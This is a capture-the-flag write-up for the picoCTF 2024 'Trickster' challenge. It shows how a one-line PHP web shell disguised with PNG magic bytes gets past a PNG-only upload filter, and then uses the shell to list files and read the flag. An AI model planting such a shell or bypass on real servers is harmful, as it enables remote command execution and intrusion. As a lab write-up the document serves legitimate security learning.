Level: Medium
Tags: Web Exploitation, picoCTF 2024, browser_webshell_solvable
Author: JUNIAS BONOU
Description:
I found a web app that can help process images: PNG images only!
Try it here!
Hints:
(None)
Challenge link: https://play.picoctf.org/practice/challenge/445
Browse to the web site and you will see a web page with the message "Welcome to my PNG processing app".
On the web page you can upload PNG files.
Right-click and select 'View page source' (or press CTRL + U) to get the HTML-source of the page.
<!DOCTYPE html>
<html>
<head>
<title>File Upload Page</title>
</head>
<body>
<h1>Welcome to my PNG processing app</h1>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file" accept=".png">
<input type="submit" value="Upload File">
</form>
</body>
</html>Not much there other than that the uploaded file needs to have a .png extension.
If we try to upload any PNG picture we get the message:
File uploaded successfully and is a valid PNG file. We shall process it and get back to you... Hopefully
We get no indication of where the file is uploaded but normally the destination is in the /uploads directory.
Let's verify this by browsing to http://atlas.picoctf.net:53321/uploads/test_file.png.
Correct! Our test file is displayed.
Next, we will try to upload a web shell disguised as a PNG-file
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Web_Exploitation/Trickster]
└─$ cat web_shell.png.php
�PNG<?php system($_GET["cmd"]); ?>
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Web_Exploitation/Trickster]
└─$ xxd web_shell.png.php
00000000: 8950 4e47 3c3f 7068 7020 7379 7374 656d .PNG<?php system
00000010: 2824 5f47 4554 5b22 636d 6422 5d29 3b20 ($_GET["cmd"]);
00000020: 3f3e 0a Note the PNG magic bytes in the beginning (89 50 4e 47) of the file.
Then we upload the web shell through the web page.
Now we can run simple commands through the web shell:
Accessing http://atlas.picoctf.net:53321/uploads/web_shell.png.php?cmd=id returns:
�PNGuid=33(www-data) gid=33(www-data) groups=33(www-data)
The web server's home directory is usually at /var/www/html. Let's check that directory.
Accessing http://atlas.picoctf.net:53321/uploads/web_shell.png.php?cmd=ls returns (with view source on the page):
�PNGtotal 16
drwxrwxrwt 1 www-data www-data 21 Mar 11 23:59 .
drwxr-xr-x 1 root root 18 Nov 21 2023 ..
-rw-r--r-- 1 root root 49 Mar 11 23:59 GNTDOMBWGIZDE.txt
-rw-r--r-- 1 root root 1572 Feb 7 17:25 index.php
-rw-r--r-- 1 root root 415 Feb 7 17:25 instructions.txt
-rw-r--r-- 1 root root 62 Feb 7 17:25 robots.txt
drwxr-xr-x 1 www-data root 31 Jul 13 08:50 uploads
The GNTDOMBWGIZDE.txt file looks very suspicious.
Viewing the file by accessing http://atlas.picoctf.net:53321/uploads/web_shell.png.php?cmd=cat%20/var/www/html/GNTDOMBWGIZDE.txt returns the flag:
�PNG/* picoCTF{<REDACTED>} */
For additional information, please see the references below.